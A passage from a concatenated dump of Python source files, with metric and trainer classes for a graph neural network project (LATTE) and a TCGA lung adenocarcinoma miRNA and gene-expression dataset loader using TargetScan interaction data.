self.metrics[metric] = Recall(average=True, is_multilabel=multilabel)
elif "top_k" in metric:
if n_classes:
top_k = [k for k in top_k if k < n_classes]
if multilabel:
self.metrics[metric] = TopKMultilabelAccuracy(k_s=top_k)
else:
self.metrics[metric] = TopKCategoricalAccuracy(k=max(int(np.log(n_classes)), 1),
output_transform=None)
elif "macro_f1" in metric:
self.metrics[metric] = F1(num_classes=n_classes, average="macro", multilabel=multilabel)
elif "micro_f1" in metric:
self.metrics[metric] = F1(num_classes=n_classes, average="micro", multilabel=multilabel)
elif "mse" == metric:
self.metrics[metric] = MeanSquaredError()
elif "auroc" == metric:
self.metrics[metric] = AUROC(num_classes=n_classes)
elif "avg_precision" in metric:
self.metrics[metric] = AveragePrecision(num_classes=n_classes, )
elif "accuracy" in metric:
self.metrics[metric] = Accuracy(top_k=int(metric.split("@")[-1]) if "@" in metric else None)
elif "ogbn" in metric:
self.metrics[metric] = OGBNodeClfMetrics(NodeEvaluator(metric))
elif "ogbg" in metric:
self.metrics[metric] = OGBNodeClfMetrics(GraphEvaluator(metric))
elif "ogbl" in metric:
self.metrics[metric] = OGBLinkPredMetrics(LinkEvaluator(metric))
else:
print(f"WARNING: metric {metric} doesn't exist")
# Needed to add the PytorchGeometric methods as Modules, so they'll be on the correct CUDA device during training
if isinstance(self.metrics[metric], torchmetrics.metric.Metric):
setattr(self, metric, self.metrics[metric])
self.reset_metrics()
def update_metrics(self, y_hat: torch.Tensor, y: torch.Tensor, weights=None):
"""
:param y_pred:
:param y_true:
:param weights:
"""
y_pred = y_hat.detach()
y_true = y.detach()
y_pred, y_true = filter_samples(y_pred, y_true, weights)
# Apply softmax/sigmoid activation if needed
if "LOGITS" in self.loss_type or "FOCAL" in self.loss_type:
if "SOFTMAX" in self.loss_type:
y_pred = torch.softmax(y_pred, dim=1)
else:
y_pred = torch.sigmoid(y_pred)
elif "NEGATIVE_LOG_LIKELIHOOD" == self.loss_type or "SOFTMAX_CROSS_ENTROPY" in self.loss_type:
y_pred = torch.softmax(y_pred, dim=1)
for metric in self.metrics:
# torchmetrics metrics
if isinstance(self.metrics[metric], torchmetrics.metric.Metric):
self.metrics[metric].update(y_pred, y_true)
# Torch ignite metrics
elif "precision" in metric or "recall" in metric or "accuracy" in metric:
if not self.multilabel and y_true.dim() == 1:
self.metrics[metric].update((self.hot_encode(y_pred.argmax(1, keepdim=False), type_as=y_true),
self.hot_encode(y_true, type_as=y_pred)))
else:
self.metrics[metric].update(((y_pred > self.threshold).type_as(y_true), y_true))
# Torch ignite metrics
elif metric == "top_k":
self.metrics[metric].update((y_pred, y_true))
# OGB metrics
elif "ogb" in metric:
if metric in ["ogbl-ddi", "ogbl-collab"]:
y_true = y_true[:, 0]
elif "ogbg-mol" in metric:
# print(tensor_sizes({"y_pred": y_pred, "y_true": y_true}))
pass
self.metrics[metric].update((y_pred, y_true))
else:
raise Exception(f"Metric {metric} has problem at .update()")
def hot_encode(self, labels, type_as):
if labels.dim() == 2:
return labels
elif labels.dim() == 1:
labels = torch.eye(self.n_classes)[labels].type_as(type_as)
return labels
def compute_metrics(self):
logs = {}
for metric in self.metrics:
try:
if "ogb" in metric:
logs.update(self.metrics[metric].compute(prefix=self.prefix))
elif metric == "top_k" and isinstance(self.metrics[metric], TopKMultilabelAccuracy):
logs.update(self.metrics[metric].compute(prefix=self.prefix))
elif metric == "top_k" and isinstance(self.metrics[metric], TopKCategoricalAccuracy):
metric_name = (metric if self.prefix is None else \
self.prefix + metric) + f"@{self.metrics[metric]._k}"
logs[metric_name] = self.metrics[metric].compute()
else:
metric_name = metric if self.prefix is None else self.prefix + metric
logs[metric_name] = self.metrics[metric].compute()
except Exception as e:
print(f"Had problem with metric {metric}, {str(e)}\r")
# Needed for Precision(average=False) metrics
logs = {k: v.mean() if isinstance(v, torch.Tensor) and v.numel() > 1 else v for k, v in logs.items()}
return logs
def reset_metrics(self):
for metric in self.metrics:
self.metrics[metric].reset()
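# A minimal usage sketch for Metrics (loss type, shapes and metric names below
# are illustrative only):
#
#   metrics = Metrics(prefix="train_", loss_type="SOFTMAX_CROSS_ENTROPY",
#                     n_classes=10, multilabel=False, metrics=["precision", "recall"])
#   metrics.update_metrics(y_hat, y)   # y_hat: (batch, 10) logits, y: (batch,) labels
#   logs = metrics.compute_metrics()
#   metrics.reset_metrics()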
class OGBNodeClfMetrics(torchmetrics.Metric):
def __init__(self, evaluator, compute_on_step: bool = True, dist_sync_on_step: bool = False,
process_group=None, dist_sync_fn=None):
super().__init__(compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
self.evaluator = evaluator
self.y_pred = []
self.y_true = []
def reset(self):
self.y_pred = []
self.y_true = []
def update(self, y_pred, y_true):
if isinstance(self.evaluator, (NodeEvaluator, GraphEvaluator)):
assert y_pred.dim() == 2
if y_true.dim() == 1 or y_true.size(1) == 1:
y_pred = y_pred.argmax(axis=1)
if y_pred.dim() <= 1:
y_pred = y_pred.unsqueeze(-1)
if y_true.dim() <= 1:
y_true = y_true.unsqueeze(-1)
self.y_true.append(y_true)
self.y_pred.append(y_pred)
def compute(self, prefix=None):
if isinstance(self.evaluator, NodeEvaluator):
output = self.evaluator.eval({"y_pred": torch.cat(self.y_pred, dim=0),
"y_true": torch.cat(self.y_true, dim=0)})
elif isinstance(self.evaluator, LinkEvaluator):
y_pred_pos = torch.cat(self.y_pred, dim=0).squeeze(-1)
y_pred_neg = torch.cat(self.y_true, dim=0)
output = self.evaluator.eval({"y_pred_pos": y_pred_pos,
"y_pred_neg": y_pred_neg})
output = {k.strip("_list"): v.mean().item() for k, v in output.items()}
elif isinstance(self.evaluator, GraphEvaluator):
            input_shape = {"y_true": torch.cat(self.y_true, dim=0),
                           "y_pred": torch.cat(self.y_pred, dim=0)}
output = self.evaluator.eval(input_shape)
else:
raise Exception(f"implement eval for {self.evaluator}")
if prefix is None:
return {f"{k}": v for k, v in output.items()}
else:
return {f"{prefix}{k}": v for k, v in output.items()}
class OGBLinkPredMetrics(torchmetrics.Metric):
def __init__(self, evaluator: LinkEvaluator, compute_on_step: bool = True, dist_sync_on_step: bool = False,
process_group=None, dist_sync_fn=None):
super().__init__(compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
self.evaluator = evaluator
self.outputs = {}
def reset(self):
self.outputs = {}
def update(self, e_pred_pos, e_pred_neg):
if e_pred_pos.dim() > 1:
e_pred_pos = e_pred_pos.squeeze(-1)
# if e_pred_neg.dim() <= 1:
# e_pred_neg = e_pred_neg.unsqueeze(-1)
# print("e_pred_pos", e_pred_pos.shape)
# print("e_pred_neg", e_pred_neg.shape)
output = self.evaluator.eval({"y_pred_pos": e_pred_pos,
"y_pred_neg": e_pred_neg})
for k, v in output.items():
if isinstance(v, float):
score = torch.tensor([v])
self.outputs.setdefault(k.strip("_list"), []).append(score)
else:
self.outputs.setdefault(k.strip("_list"), []).append(v.mean())
def compute(self, prefix=None):
output = {k: torch.stack(v, dim=0).mean().item() for k, v in self.outputs.items()}
if prefix is None:
return {f"{k}": v for k, v in output.items()}
else:
return {f"{prefix}{k}": v for k, v in output.items()}
class TopKMultilabelAccuracy(torchmetrics.Metric):
"""
Calculates the top-k categorical accuracy.
- `update` must receive output of the form `(y_pred, y)` or `{'y_pred': y_pred, 'y': y}` Tensors of size (batch_size, n_classes).
"""
def __init__(self, k_s=[5, 10, 50, 100, 200], compute_on_step: bool = True, dist_sync_on_step: bool = False,
process_group=None, dist_sync_fn=None):
super().__init__(compute_on_step, dist_sync_on_step, process_group, dist_sync_fn)
self.k_s = k_s
def reset(self):
self._num_correct = {k: 0 for k in self.k_s}
self._num_examples = 0
def update(self, y_pred, y_true):
batch_size, n_classes = y_true.size()
_, top_indices = y_pred.topk(k=max(self.k_s), dim=1, largest=True, sorted=True)
for k in self.k_s:
y_true_select = torch.gather(y_true, 1, top_indices[:, :k])
corrects_in_k = y_true_select.sum(1) * 1.0 / k
corrects_in_k = corrects_in_k.sum(0) # sum across all samples to get # of true positives
self._num_correct[k] += corrects_in_k.item()
self._num_examples += batch_size
def compute(self, prefix=None) -> dict:
if self._num_examples == 0:
raise NotComputableError("TopKCategoricalAccuracy must have at"
"least one example before it can be computed.")
if prefix is None:
return {f"top_k@{k}": self._num_correct[k] / self._num_examples for k in self.k_s}
else:
return {f"{prefix}top_k@{k}": self._num_correct[k] / self._num_examples for k in self.k_s}
```
#### File: JonnyTran/LATTE/trainer.py
```python
import itertools
import logging
import pandas as pd
import torch
from pytorch_lightning import LightningModule
from metrics import clustering_metrics, Metrics
from utils import preprocess_input, tensor_sizes
class ClusteringEvaluator(LightningModule):
def register_hooks(self):
# Register hooks for embedding layer and classifier layer
for name, layer in self.named_children():
layer.__name__ = name
print(name)
layer.register_forward_hook(self.save_embedding)
layer.register_forward_hook(self.save_pred)
# def save_node_ids(module, inputs):
# # if module.training: return
# logging.info(f"save_node_ids @ {module.__name__} {tensor_sizes(inputs)}")
#
# # Register a hook to get node_ids input
# for layer in itertools.islice(self.modules(), 1):
# print(layer.name())
# layer.register_forward_pre_hook(save_node_ids)
def save_embedding(self, module, _, outputs):
if self.training:
return
if module.__name__ == "embedder":
logging.info(f"save_embedding @ {module.__name__}")
if isinstance(outputs, (list, tuple)):
self._embeddings = outputs[0]
else:
self._embeddings = outputs
def save_pred(self, module, _, outputs):
if self.training:
return
if module.__name__ in ["classifier"]:
logging.info(
f"save_pred @ {module.__name__}, output {tensor_sizes(outputs)}")
if isinstance(outputs, (list, tuple)):
self._y_pred = outputs[0]
else:
self._y_pred = outputs
def trainvalidtest_dataloader(self):
return self.dataset.trainvalidtest_dataloader(collate_fn=self.collate_fn, )
def clustering_metrics(self, n_runs=10, compare_node_types=True):
loader = self.trainvalidtest_dataloader()
X_all, y_all, _ = next(iter(loader))
self.cpu().forward(preprocess_input(X_all, device="cpu"))
if not isinstance(self._embeddings, dict):
self._embeddings = {list(self._node_ids.keys())[0]: self._embeddings}
embeddings_all, types_all, y_true = self.dataset.get_embeddings_labels(self._embeddings, self._node_ids)
# Record metrics for each run in a list of dict's
        res = [{} for _ in range(n_runs)]
for i in range(n_runs):
y_pred = self.dataset.predict_cluster(n_clusters=len(y_true.unique()), seed=i)
if compare_node_types and len(self.dataset.node_types) > 1:
res[i].update(clustering_metrics(y_true=types_all,
# Match y_pred to type_all's index
y_pred=types_all.index.map(lambda idx: y_pred.get(idx, "")),
metrics=["homogeneity_ntype", "completeness_ntype", "nmi_ntype"]))
if y_pred.shape[0] != y_true.shape[0]:
y_pred = y_pred.loc[y_true.index]
res[i].update(clustering_metrics(y_true,
y_pred,
metrics=["homogeneity", "completeness", "nmi"]))
res_df = pd.DataFrame(res)
metrics = res_df.mean(0).to_dict()
return metrics
class NodeClfTrainer(ClusteringEvaluator):
def __init__(self, hparams, dataset, metrics, *args, **kwargs):
super().__init__(*args, **kwargs)
self.train_metrics = Metrics(prefix="", loss_type=hparams.loss_type, n_classes=dataset.n_classes,
multilabel=dataset.multilabel, metrics=metrics)
self.valid_metrics = Metrics(prefix="val_", loss_type=hparams.loss_type, n_classes=dataset.n_classes,
multilabel=dataset.multilabel, metrics=metrics)
self.test_metrics = Metrics(prefix="test_", loss_type=hparams.loss_type, n_classes=dataset.n_classes,
multilabel=dataset.multilabel, metrics=metrics)
hparams.name = self.name()
hparams.inductive = dataset.inductive
self._set_hparams(hparams)
def name(self):
if hasattr(self, "_name"):
return self._name
else:
return self.__class__.__name__
def training_epoch_end(self, outputs):
avg_loss = torch.stack([x["loss"] for x in outputs]).mean().item()
logs = self.train_metrics.compute_metrics()
# logs = _fix_dp_return_type(logs, device=outputs[0]["loss"].device)
logs.update({"loss": avg_loss})
self.train_metrics.reset_metrics()
self.log_dict(logs)
return None
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean().item()
logs = self.valid_metrics.compute_metrics()
# logs = _fix_dp_return_type(logs, device=outputs[0]["val_loss"].device)
# print({k: np.around(v.item(), decimals=3) for k, v in logs.items()})
logs.update({"val_loss": avg_loss})
self.valid_metrics.reset_metrics()
        self.log_dict(logs, prog_bar=True)
return None
def test_epoch_end(self, outputs):
avg_loss = torch.stack([x["test_loss"] for x in outputs]).mean().item()
if hasattr(self, "test_metrics"):
logs = self.test_metrics.compute_metrics()
self.test_metrics.reset_metrics()
else:
logs = {}
logs.update({"test_loss": avg_loss})
        self.log_dict(logs, prog_bar=True)
return None
def train_dataloader(self):
return self.dataset.train_dataloader(collate_fn=self.collate_fn, batch_size=self.hparams.batch_size)
def val_dataloader(self):
return self.dataset.valid_dataloader(collate_fn=self.collate_fn, batch_size=self.hparams.batch_size)
def valtrain_dataloader(self):
return self.dataset.valtrain_dataloader(collate_fn=self.collate_fn,
batch_size=self.hparams.batch_size)
def test_dataloader(self):
return self.dataset.test_dataloader(collate_fn=self.collate_fn, batch_size=self.hparams.batch_size)
def print_pred_class_counts(self, y_hat, y, multilabel, n_top_class=8):
if multilabel:
y_pred_dict = pd.Series(y_hat.sum(1).detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
y_true_dict = pd.Series(y.sum(1).detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
print(f"y_pred {len(y_pred_dict)} classes",
{str(k): v for k, v in itertools.islice(y_pred_dict.items(), n_top_class)})
print(f"y_true {len(y_true_dict)} classes",
{str(k): v for k, v in itertools.islice(y_true_dict.items(), n_top_class)})
else:
y_pred_dict = pd.Series(y_hat.argmax(1).detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
y_true_dict = pd.Series(y.detach().cpu().type(torch.int).numpy()).value_counts().to_dict()
print(f"y_pred {len(y_pred_dict)} classes",
{str(k): v for k, v in itertools.islice(y_pred_dict.items(), n_top_class)})
print(f"y_true {len(y_true_dict)} classes",
{str(k): v for k, v in itertools.islice(y_true_dict.items(), n_top_class)})
def get_n_params(self):
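        # Count the total number of scalar parameters across all named parameters.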
size = 0
for name, param in dict(self.named_parameters()).items():
nn = 1
for s in list(param.size()):
nn = nn * s
size += nn
return size
```
#### File: JonnyTran/LATTE/utils.py
```python
import numpy as np
import torch
def filter_samples(Y_hat: torch.Tensor, Y: torch.Tensor, weights):
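    # Keep only the samples whose weight is non-zero; weights may be a torch
    # tensor or a numpy-compatible array, and None disables filtering entirely.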
if weights is None:
return Y_hat, Y
if isinstance(weights, torch.Tensor):
idx = torch.nonzero(weights).view(-1)
else:
idx = torch.tensor(np.nonzero(weights)[0])
if Y.dim() > 1:
Y = Y[idx, :]
else:
Y = Y[idx]
if Y_hat.dim() > 1:
Y_hat = Y_hat[idx, :]
else:
Y_hat = Y_hat[idx]
return Y_hat, Y
def tensor_sizes(input):
if isinstance(input, dict):
return {k: tensor_sizes(v) for k, v in input.items()}
elif isinstance(input, tuple):
return tuple(tensor_sizes(v) for v in input)
elif isinstance(input, list):
return [tensor_sizes(v) for v in input]
else:
return input.shape
def preprocess_input(input, device, dtype=None, half=False):
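    # Recursively walk nested dicts/tuples/lists and convert every leaf to a
    # tensor on the requested device, with optional dtype cast and half precision.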
if isinstance(input, dict):
input = {k: preprocess_input(v, device, dtype, half) for k, v in input.items()}
elif isinstance(input, tuple):
input = tuple(preprocess_input(v, device, dtype, half) for v in input)
elif isinstance(input, list):
input = [preprocess_input(v, device, dtype, half) for v in input]
else:
input = process_tensor(input, device=device, dtype=dtype, half=half)
return input
def process_tensor(input, device=None, dtype=None, half=False):
if not isinstance(input, torch.Tensor):
input = torch.tensor(input)
if dtype:
input = input.type(dtype)
if half:
input = input.half()
if device:
input = input.to(device)
return input
``` |
{
"source": "JonnyTran/microRNA-Lung-Cancer-Associations",
"score": 3
} |
#### File: src/data/make_dataset.py
```python
import os
import numpy as np
import pandas
from definitions import ROOT_DIR
from sklearn.feature_selection import SelectFdr, f_classif
class Target_Scan:
def __init__(self, mirna_list, gene_symbols, unique_mirna_group_no=False):
self.process_targetscan_mirna_family(mirna_list, unique_mirna_group_no=unique_mirna_group_no)
self.process_mirna_target_interactions(mirna_list, gene_symbols)
self.process_mirna_target_interactions_context_score(mirna_list, gene_symbols)
def process_targetscan_mirna_family(self, mirna_list, unique_mirna_group_no=False):
targetScan_family_df = pandas.read_table(os.path.join(ROOT_DIR, 'data/external/TargetScan_miR_Family_Info.txt'),
delimiter='\t')
targetScan_family_df = targetScan_family_df[targetScan_family_df['Species ID'] == 9606]
targetScan_family_df['MiRBase ID'] = targetScan_family_df['MiRBase ID'].str.lower()
targetScan_family_df['MiRBase ID'] = targetScan_family_df['MiRBase ID'].str.replace("-3p.*|-5p.*", "")
targetScan_family_df.drop_duplicates(inplace=True)
targetScan_family_df = targetScan_family_df[['miR family', 'MiRBase ID']]
in_family_mirnas_list = targetScan_family_df["MiRBase ID"].tolist()
self.mirna_family = list(targetScan_family_df["MiRBase ID"].groupby(targetScan_family_df["miR family"]))
self.mirna_family_names = [fam[0] for fam in self.mirna_family]
self.mirna_family = {fam[0]: fam[1].tolist() for fam in self.mirna_family}
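        # Map each miRNA to the index of its TargetScan family; miRNAs not found in
        # any family get a placeholder group number: a fresh unique one per miRNA
        # when unique_mirna_group_no is True, otherwise the shared value 9999.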
self.mirna_family_assg = []
counter = 9999
for m in mirna_list:
if m in in_family_mirnas_list:
                    for k, v in self.mirna_family.items():
if m in v:
m_family = k
break
self.mirna_family_assg.append(self.mirna_family_names.index(m_family))
else:
if unique_mirna_group_no:
while counter in range(0, len(self.mirna_family_names)):
counter += 1
self.mirna_family_assg.append(counter)
counter += 1
else:
self.mirna_family_assg.append(counter)
def process_mirna_target_interactions(self, mirna_list, gene_symbols):
# Load data frame from file
targetScan_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/external/TargetScan_Predicted_Targets_Info_default_predictions.tsv'),
delimiter='\t')
targetScan_family_df = pandas.read_table(os.path.join(ROOT_DIR, 'data/external/TargetScan_miR_Family_Info.txt'),
delimiter='\t')
# Select only homo sapiens miRNA-target pairs
targetScan_df = targetScan_df[targetScan_df["Species ID"] == 9606][["miR Family", "Gene Symbol"]]
targetScan_family_df = targetScan_family_df[targetScan_family_df['Species ID'] == 9606][
['miR family', 'MiRBase ID']]
# Use miRBase ID names
targetScan_family_df.rename(columns={'miR family': 'miR Family'}, inplace=True)
targetScan_df = pandas.merge(targetScan_df, targetScan_family_df, how='inner', on="miR Family")
targetScan_df = targetScan_df[["MiRBase ID", "Gene Symbol"]]
# Standardize miRNA names
targetScan_df['MiRBase ID'] = targetScan_df['MiRBase ID'].str.lower()
targetScan_df['MiRBase ID'] = targetScan_df['MiRBase ID'].str.replace("-3p.*|-5p.*", "")
targetScan_df.drop_duplicates(inplace=True)
# Filter miRNA-target pairs to only miRNA's included in miRNA expression data, same for gene targets
self.targetScan_df = targetScan_df[
targetScan_df['MiRBase ID'].isin(mirna_list) & targetScan_df['Gene Symbol'].isin(gene_symbols)]
def get_miRNA_family_group_assg(self):
return self.mirna_family_assg
def get_miRNA_target_interaction(self):
return self.targetScan_df
def get_miRNA_target_interaction_context(self):
return self.targetScan_context_df
def print_miRNA_family(self):
for m, m_assg in zip(tgca_luad.mirna_list, self.mirna_family_assg):
if m_assg < len(self.mirna_family_names):
fam = self.mirna_family_names[m_assg]
else:
fam = ""
            print(m, '\t\t', fam)
def process_mirna_target_interactions_context_score(self, mirna_list, gene_symbols):
# Load data frame from file
targetScan_context_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/external/TargetScan_Predicted_Targets_Context_Scores.default_predictions.txt'),
delimiter='\t')
# Select only homo sapiens miRNA-target pairs
targetScan_context_df = targetScan_context_df[targetScan_context_df["Gene Tax ID"] == 9606][
["miRNA", "Gene Symbol"]]
# TODO Select only interactions with high context score
# Use miRBase ID names
targetScan_context_df.rename(columns={'miRNA': 'MiRBase ID'}, inplace=True)
# Standardize miRNA names
targetScan_context_df['MiRBase ID'] = targetScan_context_df['MiRBase ID'].str.lower()
targetScan_context_df['MiRBase ID'] = targetScan_context_df['MiRBase ID'].str.replace("-3p.*|-5p.*", "")
targetScan_context_df.drop_duplicates(inplace=True)
# Filter miRNA-target pairs to only miRNA's included in miRNA expression data, same for gene targets
self.targetScan_context_df = targetScan_context_df[
targetScan_context_df['MiRBase ID'].isin(mirna_list) & targetScan_context_df['Gene Symbol'].isin(
gene_symbols)]
class TCGA_LUAD:
def __init__(self):
pathologic_stage_map = {'Stage IA': 'Stage I', 'Stage IB': 'Stage I',
'Stage IIA': 'Stage II', 'Stage IIB': 'Stage II',
'Stage IIIA': 'Stage III', 'Stage IIIB': 'Stage III'}
histological_type_map = {'Lung Acinar Adenocarcinoma': 'Acinar',
'Lung Adenocarcinoma Mixed Subtype': 'Mixed Subtype',
'Lung Adenocarcinoma- Not Otherwise Specified (NOS)': 'NOS',
'Lung Bronchioloalveolar Carcinoma Mucinous': 'Bronchioloalveolar',
'Lung Bronchioloalveolar Carcinoma Nonmucinous': 'Bronchioloalveolar',
'Lung Clear Cell Adenocarcinoma': 'Clear Cell',
'Lung Micropapillary Adenocarcinoma': 'Micropapillary',
'Lung Papillary Adenocarcinoma': 'Papillary',
'Lung Mucinous Adenocarcinoma': 'Mucinous',
'Lung Signet Ring Adenocarcinoma': 'Signet Ring',
'Lung Solid Pattern Predominant Adenocarcinoma': 'Solid',
'Mucinous (Colloid) Carcinoma': 'Colloid'}
# miRNA
mirna_tumor_df = pandas.read_csv(os.path.join(ROOT_DIR, "data/processed/miRNA/tumor_miRNA.csv"))
mirna_normal_df = pandas.read_csv(os.path.join(ROOT_DIR, "data/processed/miRNA/normal_miRNA.csv"))
self.clinical_df = pandas.read_csv(os.path.join(ROOT_DIR, "data/processed/clinical/clinical.csv"))
self.mirna_normal = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
mirna_normal_df,
on='patient_barcode')
self.mirna_normal['pathologic_stage'] = 'normal'
self.mirna_tumor = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
mirna_tumor_df,
on='patient_barcode')
# Drop NA rows
self.mirna_tumor.dropna(axis=0, inplace=True)
self.mirna_normal.dropna(axis=0, inplace=True)
self.mirna_tumor.replace({'pathologic_stage': pathologic_stage_map}, inplace=True)
self.mirna_tumor.replace({'histological_type': histological_type_map}, inplace=True)
        print(self.mirna_tumor.columns)
self.mirna_list = list(self.mirna_tumor.columns)[3:]
########################################### Gene Expression ####################################################
gene_tumor_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/processed/gene_expression/tumor/READ__illuminahiseq_rnaseqv2__GeneExp.txt'),
header=0, delimiter='\t')
gene_normal_df = pandas.read_table(
os.path.join(ROOT_DIR, 'data/processed/gene_expression/normal/READ__illuminahiseq_rnaseqv2__GeneExp.txt'),
header=0, delimiter='\t')
gene_tumor_df.rename(columns=lambda x: x[:12], inplace=True)
gene_normal_df.rename(columns=lambda x: x[:12], inplace=True)
# Remove entries with unknown Gene Symbol
gene_tumor_df = gene_tumor_df[gene_tumor_df.GeneSymbol != '?']
gene_normal_df = gene_normal_df[gene_normal_df.GeneSymbol != '?']
# Get list of all gene_symbols
self.gene_symbols = list(gene_tumor_df['GeneSymbol'])
# Get list of tumor and normal patient_barcode
gene_exp_tumor_patient_barcodes = list(gene_tumor_df.columns)[2:]
gene_exp_normal_patient_barcodes = list(gene_normal_df.columns)[2:]
# Drop EntrezID column
self.gene_tumor = gene_tumor_df.drop(['EntrezID', 'GeneSymbol'], axis=1)
self.gene_normal = gene_normal_df.drop(['EntrezID', 'GeneSymbol'], axis=1)
# Reshaping data frame to have columns for GeneSymbols, and rows of patients
self.gene_tumor = self.gene_tumor.T
self.gene_normal = self.gene_normal.T
self.gene_tumor.columns = self.gene_symbols
self.gene_normal.columns = self.gene_symbols
# Add column for patients barcode
self.gene_tumor['patient_barcode'] = self.gene_tumor.index
self.gene_normal['patient_barcode'] = self.gene_normal.index
# Drop NA rows
self.gene_tumor.dropna(axis=0, inplace=True)
self.gene_normal.dropna(axis=0, inplace=True)
self.gene_normal = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
self.gene_normal,
on='patient_barcode')
self.gene_normal['pathologic_stage'] = 'normal'
self.gene_tumor = pandas.merge(self.clinical_df[['patient_barcode', 'pathologic_stage', 'histological_type']],
self.gene_tumor,
on='patient_barcode')
self.gene_tumor.replace({'pathologic_stage': pathologic_stage_map}, inplace=True)
self.gene_tumor.replace({'histological_type': histological_type_map}, inplace=True)
        print(self.gene_tumor['histological_type'].value_counts().sort_index(axis=0))
# Drop duplicate columns names (Gene symbols with same name)
_, i = np.unique(self.gene_tumor.columns, return_index=True)
self.gene_tumor = self.gene_tumor.iloc[:, i]
self.gene_normal = self.gene_normal.iloc[:, i]
        print('mirna_tumor', self.mirna_tumor.shape)
        print('mirna_normal', self.mirna_normal.shape)
        print('gene_tumor', self.gene_tumor.shape)
        print('gene_normal', self.gene_normal.shape)
def gene_univariate_feature_selection(self, alpha=0.01):
gene_normal_X, gene_normal_Y = self.make_dataset(dataset='gene', normal_tumor='normal',
normal_matched=True, mirna_gene_matched=True)
gene_tumor_X, gene_tumor_Y = self.make_dataset(dataset='gene', normal_tumor='tumor', normal_matched=True,
mirna_gene_matched=True)
gene_exp_filter = SelectFdr(f_classif, alpha=alpha)
gen_exp_new = gene_exp_filter.fit_transform(X=pandas.concat([gene_normal_X, gene_tumor_X]),
y=pandas.concat([gene_normal_Y, gene_tumor_Y]))
self.gene_symbols = np.asanyarray(self.gene_symbols)[gene_exp_filter.get_support(indices=True)].tolist()
self.gene_tumor = self.gene_tumor[
self.gene_symbols + ['patient_barcode', 'pathologic_stage', 'histological_type']]
self.gene_normal = self.gene_normal[
self.gene_symbols + ['patient_barcode', 'pathologic_stage', 'histological_type']]
def make_dataset(self, dataset="miRNA", normal_tumor='both', pathologic_stages=[], histological_types=[],
normal_matched=True,
mirna_gene_matched=True, stage_label_mapping=None, zero_mean=False, normalize=False):
"""
:param dataset:
:param normal_tumor:
:param pathologic_stages:
:param histological_types:
:param normal_matched:
:param mirna_gene_matched:
:param stage_label_mapping:
:param zero_mean:
:param normalize:
:return:
"""
# Find patients with both tumor and normal samples
if normal_matched:
if dataset is "miRNA":
patients = pandas.merge(self.mirna_tumor[['patient_barcode']],
self.mirna_normal[['patient_barcode']],
on='patient_barcode')
elif dataset is "gene":
patients = pandas.merge(self.gene_tumor[['patient_barcode']],
self.gene_normal[['patient_barcode']],
on='patient_barcode')
elif not normal_matched:
if dataset is "miRNA":
patients = pandas.concat([self.mirna_tumor[['patient_barcode']],
self.mirna_normal[['patient_barcode']]]).drop_duplicates()
elif dataset is "gene":
patients = pandas.concat([self.gene_tumor[['patient_barcode']],
self.gene_normal[['patient_barcode']]]).drop_duplicates()
# Find patients with matching miRNA and gene samples
if mirna_gene_matched and normal_matched:
patients_normal = pandas.merge(self.mirna_normal[['patient_barcode']],
self.gene_normal[['patient_barcode']],
on='patient_barcode')
patients_tumor = pandas.merge(self.mirna_tumor[['patient_barcode']],
self.gene_tumor[['patient_barcode']],
on='patient_barcode')
patients = pandas.merge(patients_normal, patients_tumor, on='patient_barcode')
elif mirna_gene_matched and not normal_matched:
if normal_tumor is "normal":
patients = pandas.merge(self.mirna_normal[['patient_barcode']],
self.gene_normal[['patient_barcode']],
on='patient_barcode')
elif normal_tumor is "tumor":
patients = pandas.merge(self.mirna_tumor[['patient_barcode']],
self.gene_tumor[['patient_barcode']],
on='patient_barcode')
        # Return dataset, and perform pathologic stage relabeling
        if dataset == 'miRNA':
            if normal_tumor == 'both':
return self.dataFrame_to_matrix(pandas.concat([self.mirna_tumor, self.mirna_normal]), patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
            elif normal_tumor == 'normal':
return self.dataFrame_to_matrix(self.mirna_normal, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
            elif normal_tumor == 'tumor':
return self.dataFrame_to_matrix(self.mirna_tumor, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
        elif dataset == 'gene':
            if normal_tumor == 'both':
return self.dataFrame_to_matrix(pandas.concat([self.gene_tumor, self.gene_normal]), patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
            elif normal_tumor == 'normal':
return self.dataFrame_to_matrix(self.gene_normal, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
            elif normal_tumor == 'tumor':
return self.dataFrame_to_matrix(self.gene_tumor, patients,
pathologic_stages, histological_types, stage_label_mapping, zero_mean,
normalize)
def dataFrame_to_matrix(self, data, patients, pathologic_stages, histological_types, stage_label_mapping,
zero_mean=False, normalize=False):
df = data[data['patient_barcode'].isin(patients['patient_barcode'])]
if pathologic_stages:
df = df[df['pathologic_stage'].isin(pathologic_stages)]
if histological_types:
df = df[df['histological_type'].isin(histological_types)]
if stage_label_mapping:
df['pathologic_stage'] = df['pathologic_stage'].replace(stage_label_mapping)
X = df.drop(['patient_barcode', 'pathologic_stage', 'histological_type'], axis=1)
y = df['pathologic_stage']
if normalize:
for col in X.columns:
X[col] = (X[col] - X[col].mean()) / X[col].std(0)
elif zero_mean:
for col in X.columns:
X[col] = X[col] - X[col].mean()
return X, y
def get_miRNA_list(self):
return self.mirna_list
def get_gene_list(self):
return self.gene_symbols
if __name__ == '__main__':
tgca_luad = TCGA_LUAD()
# pathologic_stage_map = {'Stage I': 1, 'Stage II': 1}
X, y = tgca_luad.make_dataset(dataset='miRNA', normal_tumor='tumor', normal_matched=False, mirna_gene_matched=True,
pathologic_stages=[])
print "X", X.shape
print "y", y.shape
print tgca_luad.make_dataset(dataset='gene', normal_tumor='tumor', normal_matched=False, mirna_gene_matched=True)[
0].shape
```
#### File: src/features/genomicdata.py
```python
import os
import numpy as np
